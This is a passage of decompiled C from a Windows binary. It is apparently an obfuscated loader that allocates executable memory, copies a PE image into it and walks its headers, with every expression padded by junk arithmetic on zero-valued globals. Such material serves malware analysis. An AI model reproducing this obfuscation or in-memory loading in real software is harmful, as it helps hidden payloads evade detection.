											_t696 = _a12(_t2060 *  *0x6da81268 + _t3412 *  *0x6da81268 +  *((intOrPtr*)(_v80 + 0x34)) +  *0x6da8126c - _t2053 *  *0x6da81264 +  *0x6da81270 +  *0x6da8126c +  *0x6da8126c + _t685 *  *0x6da8126c -  *0x6da81264 + _t2055 *  *0x6da8125c *  *0x6da8126c + _t687 *  *0x6da8126c + _t2058 *  *0x6da81268 -  *0x6da81264 +  *0x6da8126c +  *0x6da81264 +  *0x6da8126c - _t689 *  *0x6da81264 +  *0x6da81270 +  *0x6da8126c +  *0x6da8126c + _t3428 *  *0x6da8126c -  *0x6da81264 + _t691 *  *0x6da8125c *  *0x6da8126c + _t3430 *  *0x6da8126c + _t694 *  *0x6da81268 -  *0x6da81264 +  *0x6da8126c +  *0x6da81264, _v28, _t1975 + 0x00002000 -  *0x6da81268 - _t3261 *  *0x6da81268 *  *0x6da81260 - _t637 *  *0x6da8126c +  *0x6da81260 -  *0x6da81268 -  *0x6da81268 -  *0x6da81268 - _t3264 *  *0x6da81260 *  *0x6da8125c *  *0x6da81264 +  *0x6da8125c + _t639 *  *0x6da81268 -  *0x6da81260 -  *0x6da81270 -  *0x6da81270 +  *0x6da81264 +  *0x6da81260 -  *0x6da81268 - _t3268 *  *0x6da81268 *  *0x6da81260 - _t641 *  *0x6da8126c +  *0x6da81260 -  *0x6da81268 -  *0x6da81268 -  *0x6da81268 - _t3271 *  *0x6da81260 *  *0x6da8125c *  *0x6da81264 +  *0x6da8125c + _t643 *  *0x6da81268 -  *0x6da81260 -  *0x6da81270 -  *0x6da81270 +  *0x6da81264 +  *0x6da81260 -  *0x6da81268 - _t3275 *  *0x6da81268 *  *0x6da81260 - _t645 *  *0x6da8126c +  *0x6da81260 -  *0x6da81268 -  *0x6da81268 -  *0x6da81268 - _t3278 *  *0x6da81260 *  *0x6da8125c *  *0x6da81264 +  *0x6da8125c + _t647 *  *0x6da81268 -  *0x6da81260 -  *0x6da81270 -  *0x6da81270 +  *0x6da81264 +  *0x6da81260 -  *0x6da81268 - _t3282 *  *0x6da81268 *  *0x6da81260 - _t649 *  *0x6da8126c +  *0x6da81260 -  *0x6da81268 -  *0x6da81268 -  *0x6da81268 - _t3285 *  *0x6da81260 *  *0x6da8125c *  *0x6da81264 +  *0x6da8125c + _t651 *  *0x6da81268 -  *0x6da81260 -  *0x6da81270 -  *0x6da81270 +  *0x6da81264 +  *0x6da81260 -  *0x6da81268 - _t3289 *  *0x6da81268 *  *0x6da81260 - _t653 *  *0x6da8126c +  *0x6da81260 -  *0x6da81268 -  *0x6da81268 -  *0x6da81268 - _t3292 *  *0x6da81260 *  *0x6da8125c *  *0x6da81264 +  *0x6da8125c + _t655 *  *0x6da81268 -  *0x6da81260 -  *0x6da81270 -  *0x6da81270 +  *0x6da81264 | 0x00001000 -  *0x6da81268 -  *0x6da81270 -  *0x6da81268 -  *0x6da81270 -  *0x6da81260 + _t657 *  *0x6da8126c -  *0x6da81260 +  *0x6da81268 + _t659 *  *0x6da8125c -  *0x6da8126c -  *0x6da81260 -  *0x6da81268 -  *0x6da81260 -  *0x6da81270 -  *0x6da81264 -  *0x6da8126c +  *0x6da81268 +  *0x6da81268 -  *0x6da81260 -  *0x6da81268 -  *0x6da81270 -  *0x6da81268 -  *0x6da81270 -  *0x6da81260 + _t661 *  *0x6da8126c -  *0x6da81260 +  *0x6da81268 + _t663 *  *0x6da8125c -  *0x6da8126c -  *0x6da81260 -  *0x6da81268 -  *0x6da81260 -  *0x6da81270 -  *0x6da81264 -  *0x6da8126c +  *0x6da81268 +  *0x6da81268 -  *0x6da81260 -  *0x6da81268 -  *0x6da81270 -  *0x6da81268 -  *0x6da81270 -  *0x6da81260 + _t665 *  *0x6da8126c -  *0x6da81260 +  *0x6da81268 + _t667 *  *0x6da8125c -  *0x6da8126c -  *0x6da81260 -  *0x6da81268 -  *0x6da81260 -  *0x6da81270 -  *0x6da81264 -  *0x6da8126c +  *0x6da81268 +  *0x6da81268 -  *0x6da81260 -  *0x6da81268 -  *0x6da81270 -  *0x6da81268 -  *0x6da81270 -  *0x6da81260 + _t669 *  *0x6da8126c -  *0x6da81260 +  *0x6da81268 + _t671 *  *0x6da8125c -  *0x6da8126c -  *0x6da81260 -  *0x6da81268 -  *0x6da81260 -  *0x6da81270 -  *0x6da81264 -  *0x6da8126c +  *0x6da81268 +  *0x6da81268 -  *0x6da81260 -  *0x6da81268 -  *0x6da81270 -  *0x6da81268 -  *0x6da81270 -  *0x6da81260 + _t673 *  *0x6da8126c -  *0x6da81260 +  *0x6da81268 + _t675 *  *0x6da8125c -  *0x6da8126c -  *0x6da81260 -  *0x6da81268 -  *0x6da81260 -  *0x6da81270 -  *0x6da81264 -  *0x6da8126c +  *0x6da81268 +  *0x6da81268 -  *0x6da81260 -  *0x6da81268 -  *0x6da81270 -  *0x6da81268 -  *0x6da81270 -  *0x6da81260 + _t677 *  *0x6da8126c -  *0x6da81260 +  *0x6da81268 + _t679 *  *0x6da8125c -  *0x6da8126c -  *0x6da81260 -  *0x6da81268 -  *0x6da81260 -  *0x6da81270 -  *0x6da81264 -  *0x6da8126c +  *0x6da81268 +  *0x6da81268 -  *0x6da81260, _t634 + _t64 - _t3259 *  *0x6da81260 -  *0x6da81268 -  *0x6da8126c +  *0x6da8125c - _t635 *  *0x6da81260 -  *0x6da81268 -  *0x6da8126c -  *0x6da81268, _a32);
											_t4337 = _t4336 + 0x14;
											_v24 = _t696;
											if(_v24 != 0) {
												L26:
												_t697 =  *0x6da81270; // 0x0
												_t2073 =  *0x6da81270; // 0x0
												_t699 =  *0x6da81264; // 0x0
												_t2076 =  *0x6da81264; // 0x0
												_t3442 =  *0x6da8126c; // 0x0
												_t701 =  *0x6da8126c; // 0x0
												_t3446 =  *0x6da8126c; // 0x0
												_t2082 =  *0x6da8125c; // 0x0
												_t3453 =  *0x6da8126c; // 0x0
												_t2085 =  *0x6da81270; // 0x0
												_t3455 =  *0x6da81270; // 0x0
												_t714 = HeapAlloc(GetProcessHeap(), _t3455 *  *0x6da81268 + 8 -  *0x6da8126c +  *0x6da81260 + _t2082 *  *0x6da8125c *  *0x6da81260 - _t3453 *  *0x6da81260 -  *0x6da8126c +  *0x6da8125c -  *0x6da8126c + _t2085 *  *0x6da81260 *  *0x6da81264 *  *0x6da81270 +  *0x6da8125c -  *0x6da81270, _t3446 *  *0x6da81270 *  *0x6da81268 + _t2076 *  *0x6da8126c + 0x40 -  *0x6da8126c - _t697 *  *0x6da81270 - _t2073 *  *0x6da8126c *  *0x6da81268 +  *0x6da8125c - _t699 *  *0x6da81268 -  *0x6da81260 -  *0x6da81260 -  *0x6da81270 +  *0x6da81260 - _t3442 *  *0x6da81260 *  *0x6da8126c *  *0x6da8125c - _t701 *  *0x6da81268 +  *0x6da81270 +  *0x6da8125c -  *0x6da81264 -  *0x6da8126c);
												_t2089 =  *0x6da81268; // 0x0
												_t3459 =  *0x6da81264; // 0x0
												_t2091 =  *0x6da8126c; // 0x0
												_t3462 =  *0x6da81270; // 0x0
												_t2093 =  *0x6da8125c; // 0x0
												_t3464 =  *0x6da81270; // 0x0
												_t2096 =  *0x6da81268; // 0x0
												_t3466 =  *0x6da8125c; // 0x0
												_t2098 =  *0x6da81270; // 0x0
												_t3468 =  *0x6da81264; // 0x0
												_t2104 =  *0x6da81260; // 0x0
												_t3470 =  *0x6da81264; // 0x0
												_t2106 =  *0x6da81260; // 0x0
												_t3474 =  *0x6da81268; // 0x0
												_t2108 =  *0x6da8125c; // 0x0
												_t3476 =  *0x6da81270; // 0x0
												_t2110 =  *0x6da8126c; // 0x0
												_t3478 =  *0x6da81264; // 0x0
												_t2112 =  *0x6da81270; // 0x0
												_t3480 =  *0x6da81268; // 0x0
												_t734 = _t714 + (_t2089 << 6) + (_t3459 *  *0x6da81270 << 6) - (_t2091 << 6) - (_t3462 << 6) + (_t2093 *  *0x6da81264 << 6) - (_t3464 << 6) - (_t2096 << 6) + (_t3466 << 6) + (_t2098 *  *0x6da81264 *  *0x6da81260 *  *0x6da81260 *  *0x6da81260 << 6) - (_t3468 << 6) + (_t2104 << 6) - (_t3470 *  *0x6da81260 *  *0x6da81260 << 6) + (_t2106 << 6) - (_t3474 << 6) + (_t2108 << 6) + (_t3476 << 6) - (_t2110 << 6) + (_t3478 << 6) + (_t2112 << 6) + (_t3480 << 6);
												_v72 = _t734;
												if(_t734 != 0) {
													 *((intOrPtr*)(_v72 + 4)) = _v24;
													_t3483 =  *0x6da81270; // 0x0
													_t736 =  *0x6da81270; // 0x0
													_t738 =  *0x6da81270; // 0x0
													_t740 =  *0x6da81270; // 0x0
													asm("sbb ecx, ecx");
													 *(_v72 + 0x14) =  ~( ~( *(_v80 + 0x16) & 0x0000ffff & _t3483 *  *0x6da8126c + _t736 *  *0x6da8126c + 0x00002000 + _t738 *  *0x6da8126c + _t740 *  *0x6da8126c));
													 *((intOrPtr*)(_v72 + 0x1c)) = _a12;
													 *((intOrPtr*)(_v72 + 0x20)) = _a16;
													 *((intOrPtr*)(_v72 + 0x24)) = _a20;
													 *((intOrPtr*)(_v72 + 0x28)) = _a24;
													 *((intOrPtr*)(_v72 + 0x2c)) = _a28;
													 *((intOrPtr*)(_v72 + 0x34)) = _a32;
													_t2123 =  *0x6da81264; // 0x0
													_t3493 =  *0x6da81264; // 0x0
													 *((intOrPtr*)(_v72 + 0x3c)) = _t2123 *  *0x6da81260 + _v64 -  *0x6da81264 +  *0x6da81270 +  *0x6da81270 -  *0x6da81268 - _t3493 *  *0x6da8126c *  *0x6da81268 *  *0x6da8126c +  *0x6da8125c;
													_t751 =  *0x6da81270; // 0x0
													_t2130 =  *0x6da8126c; // 0x0
													_t755 =  *0x6da81264; // 0x0
													_t2132 =  *0x6da81270; // 0x0
													_t3519 =  *0x6da8126c; // 0x0
													_t2136 =  *0x6da81264; // 0x0
													_t3521 =  *0x6da81270; // 0x0
													_t781 =  *0x6da8126c; // 0x0
													_t3525 =  *0x6da81264; // 0x0
													_t783 =  *0x6da81270; // 0x0
													_t2162 =  *0x6da8126c; // 0x0
													_t787 =  *0x6da81264; // 0x0
													_t2164 =  *0x6da81270; // 0x0
													_t3551 =  *0x6da8126c; // 0x0
													_t2168 =  *0x6da81264; // 0x0
													_t813 =  *0x6da81268; // 0x0
													_t2173 =  *0x6da81268; // 0x0
													_t815 =  *0x6da81268; // 0x0
													_t2175 =  *0x6da81268; // 0x0
													_t817 =  *0x6da81268; // 0x0
													_t819 = E6DA2FAE0(_a8 -  *0x6da8126c - _t813 *  *0x6da81264 -  *0x6da8126c - _t2173 *  *0x6da81264 -  *0x6da8126c - _t815 *  *0x6da81264 -  *0x6da8126c - _t2175 *  *0x6da81264 -  *0x6da8126c - _t817 *  *0x6da81264, _t2168 *  *0x6da8125c *  *0x6da8125c + _t787 *  *0x6da8125c *  *0x6da8125c + _t3525 *  *0x6da8125c *  *0x6da8125c + _t2136 *  *0x6da8125c *  *0x6da8125c + _t755 *  *0x6da8125c *  *0x6da8125c +  *((intOrPtr*)(_v80 + 0x54)) -  *0x6da81260 -  *0x6da81260 -  *0x6da81264 - _t751 *  *0x6da81268 *  *0x6da81270 *  *0x6da81264 -  *0x6da81260 +  *0x6da81264 - _t2130 *  *0x6da81260 -  *0x6da8126c +  *0x6da81270 -  *0x6da81260 +  *0x6da8126c +  *0x6da81260 -  *0x6da8126c -  *0x6da81260 -  *0x6da8126c +  *0x6da81270 +  *0x6da81260 +  *0x6da81260 -  *0x6da81270 +  *0x6da81264 +  *0x6da81264 -  *0x6da81268 -  *0x6da81260 -  *0x6da81260 -  *0x6da81264 - _t2132 *  *0x6da81268 *  *0x6da81270 *  *0x6da81264 -  *0x6da81260 +  *0x6da81264 - _t3519 *  *0x6da81260 -  *0x6da8126c +  *0x6da81270 -  *0x6da81260 +  *0x6da8126c +  *0x6da81260 -  *0x6da8126c -  *0x6da81260 -  *0x6da8126c +  *0x6da81270 +  *0x6da81260 +  *0x6da81260 -  *0x6da81270 +  *0x6da81264 +  *0x6da81264 -  *0x6da81268 -  *0x6da81260 -  *0x6da81260 -  *0x6da81264 - _t3521 *  *0x6da81268 *  *0x6da81270 *  *0x6da81264 -  *0x6da81260 +  *0x6da81264 - _t781 *  *0x6da81260 -  *0x6da8126c +  *0x6da81270 -  *0x6da81260 +  *0x6da8126c +  *0x6da81260 -  *0x6da8126c -  *0x6da81260 -  *0x6da8126c +  *0x6da81270 +  *0x6da81260 +  *0x6da81260 -  *0x6da81270 +  *0x6da81264 +  *0x6da81264 -  *0x6da81268 -  *0x6da81260 -  *0x6da81260 -  *0x6da81264 - _t783 *  *0x6da81268 *  *0x6da81270 *  *0x6da81264 -  *0x6da81260 +  *0x6da81264 - _t2162 *  *0x6da81260 -  *0x6da8126c +  *0x6da81270 -  *0x6da81260 +  *0x6da8126c +  *0x6da81260 -  *0x6da8126c -  *0x6da81260 -  *0x6da8126c +  *0x6da81270 +  *0x6da81260 +  *0x6da81260 -  *0x6da81270 +  *0x6da81264 +  *0x6da81264 -  *0x6da81268 -  *0x6da81260 -  *0x6da81260 -  *0x6da81264 - _t2164 *  *0x6da81268 *  *0x6da81270 *  *0x6da81264 -  *0x6da81260 +  *0x6da81264 - _t3551 *  *0x6da81260 -  *0x6da8126c +  *0x6da81270 -  *0x6da81260 +  *0x6da8126c +  *0x6da81260 -  *0x6da8126c -  *0x6da81260 -  *0x6da8126c +  *0x6da81270 +  *0x6da81260 +  *0x6da81260 -  *0x6da81270 +  *0x6da81264 +  *0x6da81264 -  *0x6da81268);
													_t4338 = _t4337 + 8;
													if(_t819 != 0) {
														_t820 =  *0x6da81268; // 0x0
														_t2178 =  *0x6da8126c; // 0x0
														_t822 =  *0x6da81268; // 0x0
														_t2180 =  *0x6da8126c; // 0x0
														_t824 =  *0x6da81268; // 0x0
														_t2182 =  *0x6da8126c; // 0x0
														_t826 =  *0x6da81268; // 0x0
														_t2184 =  *0x6da8126c; // 0x0
														_t828 =  *0x6da81270; // 0x0
														_t2186 =  *0x6da81270; // 0x0
														_t831 =  *0x6da81270; // 0x0
														_t2189 =  *0x6da81270; // 0x0
														_t834 =  *0x6da81270; // 0x0
														_t2192 =  *0x6da81270; // 0x0
														_t2195 =  *0x6da81268; // 0x0
														_t3607 =  *0x6da81268; // 0x0
														_t844 =  *0x6da81268; // 0x0
														_t2197 =  *0x6da81268; // 0x0
														_t3617 =  *0x6da81268; // 0x0
														_t846 =  *0x6da81268; // 0x0
														_v8 = _a12(_v24, _t846 *  *0x6da81268 *  *0x6da81264 + _t2197 *  *0x6da81268 *  *0x6da81264 + _t3607 *  *0x6da81268 *  *0x6da81264 +  *((intOrPtr*)(_v80 + 0x54)) -  *0x6da8126c -  *0x6da81268 -  *0x6da8126c +  *0x6da8125c + _t2195 *  *0x6da81268 +  *0x6da81264 -  *0x6da8126c -  *0x6da81268 -  *0x6da8126c +  *0x6da8125c + _t844 *  *0x6da81268 +  *0x6da81264 -  *0x6da8126c -  *0x6da81268 -  *0x6da8126c +  *0x6da8125c + _t3617 *  *0x6da81268 +  *0x6da81264, 0x1000 -  *0x6da8126c - _t828 *  *0x6da81264 *  *0x6da81270 - _t2186 *  *0x6da8126c *  *0x6da8126c +  *0x6da81270 -  *0x6da8126c - _t831 *  *0x6da81264 *  *0x6da81270 - _t2189 *  *0x6da8126c *  *0x6da8126c +  *0x6da81270 -  *0x6da8126c - _t834 *  *0x6da81264 *  *0x6da81270 - _t2192 *  *0x6da8126c *  *0x6da8126c +  *0x6da81270, 4 -  *0x6da81260 +  *0x6da81268 -  *0x6da81260 +  *0x6da8126c -  *0x6da81260 + _t820 *  *0x6da81260 - _t2178 *  *0x6da8125c -  *0x6da81260 +  *0x6da81268 -  *0x6da81260 +  *0x6da8126c -  *0x6da81260 + _t822 *  *0x6da81260 - _t2180 *  *0x6da8125c -  *0x6da81260 +  *0x6da81268 -  *0x6da81260 +  *0x6da8126c -  *0x6da81260 + _t824 *  *0x6da81260 - _t2182 *  *0x6da8125c -  *0x6da81260 +  *0x6da81268 -  *0x6da81260 +  *0x6da8126c -  *0x6da81260 + _t826 *  *0x6da81260 - _t2184 *  *0x6da8125c, _a32);
														_t2208 =  *0x6da81264; // 0x0
														_t3620 =  *0x6da81264; // 0x0
														_t854 =  *0x6da81264; // 0x0
														_t2221 =  *0x6da81264; // 0x0
														_t3622 =  *0x6da81264; // 0x0
														_t867 =  *0x6da81264; // 0x0
														_t2223 =  *0x6da81264; // 0x0
														_t3635 =  *0x6da81264; // 0x0
														_t869 =  *0x6da81264; // 0x0
														_t2236 =  *0x6da81264; // 0x0
														memcpy(_v8, _v16, _t869 *  *0x6da8125c *  *0x6da81270 + _t2223 *  *0x6da8125c *  *0x6da81270 + _t3622 *  *0x6da8125c *  *0x6da81270 + _t854 *  *0x6da8125c *  *0x6da81270 + _t2208 *  *0x6da8125c *  *0x6da81270 +  *((intOrPtr*)(_v80 + 0x54)) -  *0x6da81260 +  *0x6da8126c +  *0x6da81270 -  *0x6da8126c -  *0x6da81270 +  *0x6da81260 -  *0x6da81270 +  *0x6da81260 - _t3620 *  *0x6da81268 -  *0x6da81260 +  *0x6da8126c +  *0x6da81270 -  *0x6da8126c -  *0x6da81270 +  *0x6da81260 -  *0x6da81270 +  *0x6da81260 - _t2221 *  *0x6da81268 -  *0x6da81260 +  *0x6da8126c +  *0x6da81270 -  *0x6da8126c -  *0x6da81270 +  *0x6da81260 -  *0x6da81270 +  *0x6da81260 - _t867 *  *0x6da81268 -  *0x6da81260 +  *0x6da8126c +  *0x6da81270 -  *0x6da8126c -  *0x6da81270 +  *0x6da81260 -  *0x6da81270 +  *0x6da81260 - _t3635 *  *0x6da81268 -  *0x6da81260 +  *0x6da8126c +  *0x6da81270 -  *0x6da8126c -  *0x6da81270 +  *0x6da81260 -  *0x6da81270 +  *0x6da81260 - _t2236 *  *0x6da81268);
														_t128 = _v16 + 0x3c; // 0xa83d743d
														_t882 =  *0x6da81264; // 0x0
														_t2239 =  *0x6da81268; // 0x0
														_t884 =  *0x6da8125c; // 0x0
														_t2242 =  *0x6da81270; // 0x0
														_t886 =  *0x6da81264; // 0x0
														_t2244 =  *0x6da81268; // 0x0
														_t888 =  *0x6da8125c; // 0x0
														_t2247 =  *0x6da81270; // 0x0
														_t890 =  *0x6da81264; // 0x0
														_t2249 =  *0x6da81268; // 0x0
														_t892 =  *0x6da8125c; // 0x0
														_t2252 =  *0x6da81270; // 0x0
														_t894 =  *0x6da81264; // 0x0
														_t2254 =  *0x6da81268; // 0x0
														_t896 =  *0x6da8125c; // 0x0
														_t2257 =  *0x6da81270; // 0x0
														_t898 =  *0x6da81264; // 0x0
														_t2259 =  *0x6da81268; // 0x0
														_t900 =  *0x6da8125c; // 0x0
														_t2262 =  *0x6da81270; // 0x0
														_t902 =  *0x6da81264; // 0x0
														_t2264 =  *0x6da81268; // 0x0
														_t904 =  *0x6da8125c; // 0x0
														_t2267 =  *0x6da81270; // 0x0
														_t906 =  *0x6da81264; // 0x0
														_t2269 =  *0x6da81268; // 0x0
														_t908 =  *0x6da8125c; // 0x0
														_t2272 =  *0x6da81270; // 0x0
														_t910 =  *0x6da8125c; // 0x0
														_t2274 =  *0x6da81260; // 0x0
														_t912 =  *0x6da81268; // 0x0
														_t2276 =  *0x6da81268; // 0x0
														_t914 =  *0x6da81260; // 0x0
														_t2278 =  *0x6da81264; // 0x0
														_t916 =  *0x6da81268; // 0x0
														_t2281 =  *0x6da81260; // 0x0
														_t918 =  *0x6da81264; // 0x0
														_t2284 =  *0x6da81270; // 0x0
														_t920 =  *0x6da8125c; // 0x0
														_t2286 =  *0x6da81260; // 0x0
														_t922 =  *0x6da8125c; // 0x0
														_t2289 =  *0x6da81268; // 0x0
														_t924 =  *0x6da81270; // 0x0
														_t2292 =  *0x6da81264; // 0x0
														_t926 =  *0x6da8125c; // 0x0
														_t2294 =  *0x6da81270; // 0x0
														_t928 =  *0x6da81260; // 0x0
														_t2296 =  *0x6da8126c; // 0x0
														_t930 =  *0x6da8125c; // 0x0
														_t2298 =  *0x6da81268; // 0x0
														_t932 =  *0x6da8126c; // 0x0
														_t2300 =  *0x6da81270; // 0x0
														_t935 =  *0x6da8125c; // 0x0
														_t2303 =  *0x6da81260; // 0x0
														_t937 =  *0x6da81268; // 0x0
														_t2305 =  *0x6da81268; // 0x0
														_t939 =  *0x6da81260; // 0x0
														_t2307 =  *0x6da81264; // 0x0
														_t941 =  *0x6da81268; // 0x0
														_t2310 =  *0x6da81260; // 0x0
														_t943 =  *0x6da81264; // 0x0
														_t2313 =  *0x6da81270; // 0x0
														_t945 =  *0x6da8125c; // 0x0
														_t2315 =  *0x6da81260; // 0x0
														_t947 =  *0x6da8125c; // 0x0
														_t2318 =  *0x6da81268; // 0x0
														_t949 =  *0x6da81270; // 0x0
														_t2321 =  *0x6da81264; // 0x0
														_t951 =  *0x6da8125c; // 0x0
														_t2323 =  *0x6da81270; // 0x0
														_t953 =  *0x6da81260; // 0x0
														_t2325 =  *0x6da8126c; // 0x0
														_t955 =  *0x6da8125c; // 0x0
														_t2327 =  *0x6da81268; // 0x0
														_t957 =  *0x6da8126c; // 0x0
														_t2329 =  *0x6da81270; // 0x0
														 *_v72 =  *_t128 -  *0x6da81270 + _t882 *  *0x6da81268 -  *0x6da81270 -  *0x6da81264 +  *0x6da81270 - _t2239 *  *0x6da81264 *  *0x6da81268 -  *0x6da81268 + _t884 *  *0x6da8126c -  *0x6da81270 -  *0x6da81268 - _t2242 *  *0x6da8125c -  *0x6da81270 + _t886 *  *0x6da81268 -  *0x6da81270 -  *0x6da81264 +  *0x6da81270 - _t2244 *  *0x6da81264 *  *0x6da81268 -  *0x6da81268 + _t888 *  *0x6da8126c -  *0x6da81270 -  *0x6da81268 - _t2247 *  *0x6da8125c -  *0x6da81270 + _t890 *  *0x6da81268 -  *0x6da81270 -  *0x6da81264 +  *0x6da81270 - _t2249 *  *0x6da81264 *  *0x6da81268 -  *0x6da81268 + _t892 *  *0x6da8126c -  *0x6da81270 -  *0x6da81268 - _t2252 *  *0x6da8125c -  *0x6da81270 + _t894 *  *0x6da81268 -  *0x6da81270 -  *0x6da81264 +  *0x6da81270 - _t2254 *  *0x6da81264 *  *0x6da81268 -  *0x6da81268 + _t896 *  *0x6da8126c -  *0x6da81270 -  *0x6da81268 - _t2257 *  *0x6da8125c -  *0x6da81270 + _t898 *  *0x6da81268 -  *0x6da81270 -  *0x6da81264 +  *0x6da81270 - _t2259 *  *0x6da81264 *  *0x6da81268 -  *0x6da81268 + _t900 *  *0x6da8126c -  *0x6da81270 -  *0x6da81268 - _t2262 *  *0x6da8125c -  *0x6da81270 + _t902 *  *0x6da81268 -  *0x6da81270 -  *0x6da81264 +  *0x6da81270 - _t2264 *  *0x6da81264 *  *0x6da81268 -  *0x6da81268 + _t904 *  *0x6da8126c -  *0x6da81270 -  *0x6da81268 - _t2267 *  *0x6da8125c -  *0x6da81270 + _t906 *  *0x6da81268 -  *0x6da81270 -  *0x6da81264 +  *0x6da81270 - _t2269 *  *0x6da81264 *  *0x6da81268 -  *0x6da81268 + _t908 *  *0x6da8126c -  *0x6da81270 -  *0x6da81268 - _t2272 *  *0x6da8125c + _v8 - _t910 * 0xf8 - _t2274 * 0xf8 - _t912 * 0xf8 + _t2276 * 0xf8 + _t914 * 0xf8 + _t2278 *  *0x6da81270 * 0xf8 - _t916 * 0xf8 - _t2281 *  *0x6da81260 * 0xf8 + _t918 * 0xf8 - _t2284 * 0xf8 + _t920 * 0xf8 - _t2286 *  *0x6da81260 * 0xf8 + _t922 * 0xf8 - _t2289 *  *0x6da8126c * 0xf8 - _t924 * 0xf8 - _t2292 * 0xf8 - _t926 * 0xf8 + _t2294 * 0xf8 - _t928 * 0xf8 - _t2296 * 0xf8 - _t930 * 0xf8 + _t2298 * 0xf8 + _t932 *  *0x6da8125c * 0xf8 - _t2300 *  *0x6da81268 * 0xf8 - _t935 * 0xf8 - _t2303 * 0xf8 - _t937 * 0xf8 + _t2305 * 0xf8 + _t939 * 0xf8 + _t2307 *  *0x6da81270 * 0xf8 - _t941 * 0xf8 - _t2310 *  *0x6da81260 * 0xf8 + _t943 * 0xf8 - _t2313 * 0xf8 + _t945 * 0xf8 - _t2315 *  *0x6da81260 * 0xf8 + _t947 * 0xf8 - _t2318 *  *0x6da8126c * 0xf8 - _t949 * 0xf8 - _t2321 * 0xf8 - _t951 * 0xf8 + _t2323 * 0xf8 - _t953 * 0xf8 - _t2325 * 0xf8 - _t955 * 0xf8 + _t2327 * 0xf8 + _t957 *  *0x6da8125c * 0xf8 - _t2329 *  *0x6da81268 * 0xf8;
														asm("cdq");
														_t962 =  *0x6da81268; // 0x0
														asm("cdq");
														asm("sbb esi, edx");
														_t963 =  *0x6da81270; // 0x0
														asm("cdq");
														asm("sbb esi, edx");
														_t965 =  *0x6da81260; // 0x0
														asm("cdq");
														asm("adc esi, edx");
														_t966 =  *0x6da8126c; // 0x0
														asm("cdq");
														asm("sbb esi, edx");
														_t967 =  *0x6da81268; // 0x0
														asm("cdq");
														asm("sbb esi, edx");
														_t968 =  *0x6da81260; // 0x0
														asm("cdq");
														asm("sbb esi, edx");
														_t972 =  *0x6da81260; // 0x0
														asm("cdq");
														asm("sbb esi, edx");
														_t974 =  *0x6da81264; // 0x0
														asm("cdq");
														asm("adc esi, edx");
														_t975 =  *0x6da81270; // 0x0
														asm("cdq");
														asm("adc esi, edx");
														_t976 =  *0x6da81268; // 0x0
														asm("cdq");
														asm("sbb esi, edx");
														_t977 =  *0x6da81270; // 0x0
														asm("cdq");
														asm("adc esi, edx");
														_t978 =  *0x6da81268; // 0x0
														asm("cdq");
														asm("sbb esi, edx");
														_t979 =  *0x6da8125c; // 0x0
														asm("cdq");
														asm("adc esi, edx");
														_t980 =  *0x6da81264; // 0x0
														asm("cdq");
														asm("adc esi, edx");
														_t981 =  *0x6da81260; // 0x0
														asm("cdq");
														asm("sbb esi, edx");
														_t982 =  *0x6da81264; // 0x0
														asm("cdq");
														asm("sbb esi, edx");
														_t983 =  *0x6da81268; // 0x0
														asm("cdq");
														asm("sbb esi, edx");
														_t984 =  *0x6da81268; // 0x0
														asm("cdq");
														asm("sbb esi, edx");
														_t985 =  *0x6da81270; // 0x0
														asm("cdq");
														asm("sbb esi, edx");
														_t987 =  *0x6da81260; // 0x0
														asm("cdq");
														asm("adc esi, edx");
														_t988 =  *0x6da8126c; // 0x0
														asm("cdq");
														asm("sbb esi, edx");
														_t989 =  *0x6da81268; // 0x0
														asm("cdq");
														asm("sbb esi, edx");
														_t990 =  *0x6da81260; // 0x0
														asm("cdq");
														asm("sbb esi, edx");
														_t994 =  *0x6da81260; // 0x0
														asm("cdq");
														asm("sbb esi, edx");
														_t996 =  *0x6da81264; // 0x0
														asm("cdq");
														asm("adc esi, edx");
														_t997 =  *0x6da81270; // 0x0
														asm("cdq");
														asm("adc esi, edx");
														_t998 =  *0x6da81268; // 0x0
														asm("cdq");
														asm("sbb esi, edx");
														_t999 =  *0x6da81270; // 0x0
														asm("cdq");
														asm("adc esi, edx");
														_t1000 =  *0x6da81268; // 0x0
														asm("cdq");
														asm("sbb esi, edx");
														_t1001 =  *0x6da8125c; // 0x0
														asm("cdq");
														asm("adc esi, edx");
														_t1002 =  *0x6da81264; // 0x0
														asm("cdq");
														asm("adc esi, edx");
														_t1003 =  *0x6da81260; // 0x0
														asm("cdq");
														asm("sbb esi, edx");
														_t1004 =  *0x6da81264; // 0x0
														asm("cdq");
														asm("sbb esi, edx");
														_t1005 =  *0x6da81268; // 0x0
														asm("cdq");
														asm("sbb esi, edx");
														_t1006 =  *0x6da81268; // 0x0
														asm("cdq");
														asm("sbb esi, edx");
														_t1007 =  *0x6da81270; // 0x0
														asm("cdq");
														asm("sbb esi, edx");
														_t1009 =  *0x6da81260; // 0x0
														asm("cdq");
														asm("adc esi, edx");
														_t1010 =  *0x6da8126c; // 0x0
														asm("cdq");
														asm("sbb esi, edx");
														_t1011 =  *0x6da81268; // 0x0
														asm("cdq");
														asm("sbb esi, edx");
														_t1012 =  *0x6da81260; // 0x0
														asm("cdq");
														asm("sbb esi, edx");
														_t1016 =  *0x6da81260; // 0x0
														asm("cdq");
														asm("sbb esi, edx");
														_t1018 =  *0x6da81264; // 0x0
														asm("cdq");
														asm("adc esi, edx");
														_t1019 =  *0x6da81270; // 0x0
														asm("cdq");
														asm("adc esi, edx");
														_t1020 =  *0x6da81268; // 0x0
														asm("cdq");
														asm("sbb esi, edx");
														_t1021 =  *0x6da81270; // 0x0
														asm("cdq");
														asm("adc esi, edx");
														_t1022 =  *0x6da81268; // 0x0
														asm("cdq");
														asm("sbb esi, edx");
														_t1023 =  *0x6da8125c; // 0x0
														asm("cdq");
														asm("adc esi, edx");
														_t1024 =  *0x6da81264; // 0x0
														asm("cdq");
														asm("adc esi, edx");
														_t1025 =  *0x6da81260; // 0x0
														asm("cdq");
														asm("sbb esi, edx");
														_t1026 =  *0x6da81264; // 0x0
														asm("cdq");
														asm("sbb esi, edx");
														_t1027 =  *0x6da81268; // 0x0
														asm("cdq");
														asm("sbb esi, edx");
